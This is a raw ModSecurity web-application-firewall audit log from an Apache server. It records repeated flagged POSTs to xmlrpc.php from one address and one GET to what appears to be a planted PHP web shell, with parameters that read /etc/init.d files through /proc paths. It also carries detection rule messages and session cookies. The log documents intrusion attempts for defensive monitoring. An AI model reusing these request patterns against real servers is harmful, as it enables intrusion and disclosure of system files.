1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=rq5b7btnl15ls02505aoel5m29; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_7374a0e72d2424ed5526c23755d347%7C%7C1750291184%7C%7C1750287584%7C%7Cf89dfae89468aa3a6b273075561e020e; expires=Wed, 18 Jun 2025 23:59:44 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=250435697c66f6f7017b5ccfdb696989%7C%7C1750291184%7C%7C1750287584%7C%7C8f90b065044c8e3f99539d75fdd8078b; expires=Wed, 18 Jun 2025 23:59:44 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1ec91914-E-- --1ec91914-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCv71CTF37l_jAzt4oWQAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118383210134 1050866 (- - -) Stopwatch2: 1750118383210134 1050866; combined=3304, p1=412, p2=2404, p3=135, p4=41, p5=196, sr=103, sw=116, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1ec91914-Z-- --79b70e14-A-- [17/Jun/2025:05:30:44.210267 +0530] aFCwK1JfblPUQiSn5r2VJAAAAAA 146.190.105.35 55932 127.0.0.1 7081 --79b70e14-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=4u21l0mprpvso8g2dk81h81qtq; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_1b5fa6b93bef0b28c788ae89ac19a4%7C%7C1750291242%7C%7C1750287642%7C%7C1c8d367b1720db8f3ced3aab77f34729; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=8fe288ab6debd2c3df9e523c61395f71%7C%7C1750291242%7C%7C1750287642%7C%7C39b66a1e07702bb3f4c58403d1a14883 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --79b70e14-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=3ch4nrp8ass0ek9mfe2bpej0aq; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_99b5259d9e1809efde997a29b1f7b5%7C%7C1750291243%7C%7C1750287643%7C%7C2e75030a4f5ef8413c7f470a2104c85d; expires=Thu, 19 Jun 2025 00:00:43 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=31fdbb3f072aa1015954bc1d773ccfdc%7C%7C1750291244%7C%7C1750287644%7C%7C222c3a8e8fc4b86e5de2383c83e21c46; expires=Thu, 19 Jun 2025 00:00:44 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --79b70e14-E-- --79b70e14-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (43+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (43+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCwK1JfblPUQiSn5r2VJAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118443105596 1104761 (- - -) Stopwatch2: 1750118443105596 1104761; combined=4180, p1=446, p2=3285, p3=110, p4=44, p5=181, sr=102, sw=114, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --79b70e14-Z-- --cb257800-A-- [17/Jun/2025:05:31:44.300012 +0530] aFCwZwJ4p5Cdblnjra57pAAAAAI 146.190.105.35 49382 127.0.0.1 7081 --cb257800-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=a8q7suttv556p9eu99h02uspeq; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_60c37bc10cf87622f006e31b1a8f01%7C%7C1750291302%7C%7C1750287702%7C%7C94cc7b464a6bf4dc400e3d9548e7640e; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=36abb508a6a7a078eb00a706f2c4201d%7C%7C1750291302%7C%7C1750287702%7C%7C78f8f39d731ba8eb026b52427ba666bb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --cb257800-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=392v7sa0il4mq8rft63qfig68e; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_8c0acbff55f50cb7e3c021f682cc67%7C%7C1750291304%7C%7C1750287704%7C%7Ca19be8c51d95403be79985c74c3716c6; expires=Thu, 19 Jun 2025 00:01:44 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=80079d6f4b4c3b96fed00581d6ba6de4%7C%7C1750291304%7C%7C1750287704%7C%7C46c4600c39d2c621e5f8d44e6b8d1468; expires=Thu, 19 Jun 2025 00:01:44 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --cb257800-E-- --cb257800-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCwZwJ4p5Cdblnjra57pAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118503264043 1036061 (- - -) Stopwatch2: 1750118503264043 1036061; combined=3312, p1=459, p2=2372, p3=127, p4=42, p5=191, sr=143, sw=121, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cb257800-Z-- --94fff468-A-- [17/Jun/2025:05:32:44.389279 +0530] aFCwo2j9J38fG6WAr4pb4AAAAAk 146.190.105.35 57022 127.0.0.1 7081 --94fff468-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=bdmthivp8p2dmb7rs71bsm3mop; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_8132d99be9a56c07dfd0c5212410bf%7C%7C1750291362%7C%7C1750287762%7C%7C2cbb2109a64d4be1cf19941f44fcf1cc; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=f2e2ee3c5ea5da9338b213596c78248b%7C%7C1750291362%7C%7C1750287762%7C%7C56f4f87d8f7825642e47b6eec6b1f5e1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --94fff468-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=4c75b7gp427jso664os7t5mndn; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_7b1e431122a956cbb631d4b7f60da2%7C%7C1750291364%7C%7C1750287764%7C%7C9be2e157e874333dc5fe5403c734e549; expires=Thu, 19 Jun 2025 00:02:44 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=035f0573307349852719ca6d4c8de17e%7C%7C1750291364%7C%7C1750287764%7C%7Cf2f36e2d16681462f742e272bf066743; expires=Thu, 19 Jun 2025 00:02:44 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --94fff468-E-- --94fff468-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCwo2j9J38fG6WAr4pb4AAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118563270780 1118578 (- - -) Stopwatch2: 1750118563270780 1118578; combined=2947, p1=383, p2=2156, p3=100, p4=33, p5=176, sr=93, sw=99, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --94fff468-Z-- --df149800-A-- [17/Jun/2025:05:33:45.187735 +0530] aFCw4FJfblPUQiSn5r2VkwAAAAA 146.190.105.35 48780 127.0.0.1 7081 --df149800-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=ot11bt56bdmplv5f3hrlocoga2; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_2b6f87541403fbbf124f9e74154a38%7C%7C1750291423%7C%7C1750287823%7C%7C126f4a0a4711bf8f703d7f7e25c26689; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=8004c8672d01409ef8ed02a2cab8babb%7C%7C1750291423%7C%7C1750287823%7C%7C48ffb307b9f0d7d75a32758da57b17a4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --df149800-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=993r9n3j8hifmujte7om88f5ip; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_83e7d6f262a69390ac22fa5d17303a%7C%7C1750291424%7C%7C1750287824%7C%7C1c03d2fe220c0c998e6a8e340a2e90ff; expires=Thu, 19 Jun 2025 00:03:44 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=678f65ba90ac33191e227668b10b6aa8%7C%7C1750291425%7C%7C1750287825%7C%7Ca78aa36fb99084508d4f507ab6438a1c; expires=Thu, 19 Jun 2025 00:03:45 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --df149800-E-- --df149800-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCw4FJfblPUQiSn5r2VkwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118624018477 1169357 (- - -) Stopwatch2: 1750118624018477 1169357; combined=3101, p1=438, p2=2160, p3=129, p4=42, p5=206, sr=101, sw=126, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --df149800-Z-- --bf1d3001-A-- [17/Jun/2025:05:34:45.910650 +0530] aFCxHBXnhE9cEv89BPm5bgAAAAc 146.190.105.35 49206 127.0.0.1 7081 --bf1d3001-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=jgfa44qrstjs0oqi80t6bvi889; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_6d0069f5c234451890b1c31c5c038a%7C%7C1750291484%7C%7C1750287884%7C%7Ceafca3e0374d81efe74a144f33c0b712; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=11448dd38a3e2c6c5bcf94f00d4771cc%7C%7C1750291484%7C%7C1750287884%7C%7C507c014023c978ab3906e9e535903caa User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --bf1d3001-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=7a73gq8jiq5m07tkpm0ogcr5u6; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_32e344452b6d3afdd3097024716c06%7C%7C1750291485%7C%7C1750287885%7C%7Ccf42e95053333d0f7bd70f48f370bfd8; expires=Thu, 19 Jun 2025 00:04:45 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=2f3f8903737af1e9e3a345e5f691b636%7C%7C1750291485%7C%7C1750287885%7C%7Cd2f5068711493809eb002a19da6fa572; expires=Thu, 19 Jun 2025 00:04:45 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --bf1d3001-E-- --bf1d3001-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCxHBXnhE9cEv89BPm5bgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118684747645 1163094 (- - -) Stopwatch2: 1750118684747645 1163094; combined=3226, p1=395, p2=2421, p3=108, p4=39, p5=166, sr=96, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bf1d3001-Z-- --f4e42b11-A-- [17/Jun/2025:05:35:45.200352 +0530] aFCxWOTJOk1gXj_qIh4cSgAAAAQ 146.190.105.35 42078 127.0.0.1 7081 --f4e42b11-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=58fieplu9gfqque03l1vjndonr; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_16548c890120156ac77511227a3a2f%7C%7C1750291543%7C%7C1750287943%7C%7Cb57c6b1fc63ab458ebea5f71c83f217c; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=44514f4a77dcd921ac2ec848058c4a9a%7C%7C1750291543%7C%7C1750287943%7C%7C497f0d31bfcbf8dce5225e29d230554c User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --f4e42b11-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=odtktv355ojoflgab5lrmh3dlt; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_0e1fdeefbf59cc396cbd6a9a7bb9ca%7C%7C1750291544%7C%7C1750287944%7C%7C5a093978ed06c611a041fd3ce6e1e95e; expires=Thu, 19 Jun 2025 00:05:44 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=e578edd7b76377d3bfb29d43ecfcc12f%7C%7C1750291545%7C%7C1750287945%7C%7C43c1ea0c37d15ff3c39339f1acd83fe5; expires=Thu, 19 Jun 2025 00:05:45 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f4e42b11-E-- --f4e42b11-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (43+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (43+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCxWOTJOk1gXj_qIh4cSgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118744109557 1090900 (- - -) Stopwatch2: 1750118744109557 1090900; combined=3275, p1=473, p2=2375, p3=116, p4=40, p5=165, sr=145, sw=106, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f4e42b11-Z-- --c5c9e462-A-- [17/Jun/2025:05:36:18.883817 +0530] aFCxeooVQnPDyHnl9oPYHwAAAAY 216.73.216.240 32948 127.0.0.1 7081 --c5c9e462-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fapache2 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --c5c9e462-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 5464 Connection: close Content-Type: text/html; charset=UTF-8 --c5c9e462-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/apache2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCxeooVQnPDyHnl9oPYHwAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/apache2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCxeooVQnPDyHnl9oPYHwAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750118778878799 5075 (- - -) Stopwatch2: 1750118778878799 5075; combined=2724, p1=359, p2=2192, p3=43, p4=34, p5=96, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c5c9e462-Z-- --5501282a-A-- [17/Jun/2025:05:36:45.413904 +0530] aFCxlFCTF37l_jAzt4oXcQAAAAU 146.190.105.35 33866 127.0.0.1 7081 --5501282a-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=dt7t6sjg16v1lh6hv2jvpqo35i; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_864ddfe11284654440dced70cea690%7C%7C1750291603%7C%7C1750288003%7C%7C589f8b2dcb76a51ff93dbe7b34ce6926; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=50fc35a79c965b592cd236b8d9447e7d%7C%7C1750291604%7C%7C1750288004%7C%7C347c1ac2f858422792212b4823c4f635 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --5501282a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=mct1eahr5ii6d0rfntgn0a8t50; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_0347c09f8292425f557853531a7641%7C%7C1750291605%7C%7C1750288005%7C%7C05df1794ba8c9a6d61a494300092ae92; expires=Thu, 19 Jun 2025 00:06:45 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=a1568be9c0b9b28be93972eb4a49df12%7C%7C1750291605%7C%7C1750288005%7C%7C37c40d554b5bff407ecb3ee5ee972175; expires=Thu, 19 Jun 2025 00:06:45 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5501282a-E-- --5501282a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] 